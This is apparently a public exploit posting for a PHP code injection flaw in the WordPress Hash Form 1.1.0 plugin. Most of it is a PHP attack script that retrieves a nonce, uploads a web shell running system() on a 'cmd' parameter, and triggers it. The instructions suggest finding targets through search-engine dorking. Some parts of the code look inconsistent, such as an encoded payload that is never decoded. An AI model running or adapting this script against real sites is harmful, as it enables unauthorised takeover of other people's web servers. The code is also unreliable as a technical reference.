=============================================================================================================================================
| # Title     : WordPress Hash Form 1.1.0 php code injection Vulnerability                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://plugintests.com/plugins/wporg/hash-form/latest                                                                      |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 117 set your target.

[+] Line 111 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class WordPressHashFormRCE {
    private $target_url;
    private $nonce;

    public function __construct($target_url) {
        $this->target_url = $target_url;
    }

    public function check() {
        if (!$this->isWordPressOnline()) {
            return 'WordPress does not appear to be online.';
        }

        $plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');

        if ($plugin_version === null) {
            return 'Hash Form plugin does not appear to be installed.';
        }

        if ($plugin_version === false) {
            return 'Hash Form plugin is installed but the version is unknown.';
        }

        if ($plugin_version !== '1.1.0') {
            return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";
        }

        return "Detected Hash Form plugin version: $plugin_version";
    }

    public function exploit() {
        echo "Attempting to retrieve nonce from the target...\n";
        $this->nonce = $this->getNonce();

        if (!$this->nonce) {
            die('Failed to retrieve the nonce necessary for file upload.');
        }

        echo "Nonce retrieved: {$this->nonce}\n";
        echo "Uploading PHP payload using the retrieved nonce...\n";

        $file_url = $this->uploadPhpFile();
        if (!$file_url) {
            die('Failed to upload the PHP payload. Check file permissions and server settings.');
        }

        echo "PHP payload uploaded successfully to $file_url\n";
        $this->triggerPayload($file_url);
    }

    private function isWordPressOnline() {
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');
        return $response !== false;
    }

    private function checkPluginVersion($plugin_name, $version) {
        $response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");
        if ($response === false) return null;

        preg_match('/"version":"([^"]+)"/', $response, $matches);
        return $matches[1] ?? false;  // return the version or false if not found
    }

    private function getNonce() {
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');
        if ($response === false) return null;

        preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);
        return $matches[1] ?? null;
    }

    private function uploadPhpFile() {
        $file_content = $this->createPayload();
        $file_name = strtolower(bin2hex(random_bytes(4))) . '.php';

        $response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [
            'action' => 'hashform_file_upload_action',
            'file_uploader_nonce' => $this->nonce,
            'allowedExtensions[0]' => 'php',
            'sizeLimit' => 1048576,
            'qqfile' => $file_name,
            'data' => $file_content
        ]);

        $json_response = json_decode($response, true);
        return $json_response['url'] ?? null;
    }

    private function triggerPayload($url) {
        echo "Triggering the payload...\n";
        $this->sendRequest('GET', $url);
    }

    private function sendRequest($method, $uri, $data = []) {
        $url = $this->target_url . $uri;
        $options = [
            'http' => [
                'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
                'method' => $method,
                'content' => http_build_query($data),
            ],
        ];
        $context = stream_context_create($options);
        return @file_get_contents($url, false, $context);
    }

    private function createPayload() {
        // You can define your payload logic here, for now, we return a simple payload
        $payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";
        return base64_encode($payload);
    }
}

// استخدام الوحدة
$target_url = 'http://target-wordpress-site.com';
$exploit = new WordPressHashFormRCE($target_url);

// تحقق من الثغرة
echo $exploit->check() . "\n";

// تنفيذ الاستغلال
$exploit->exploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================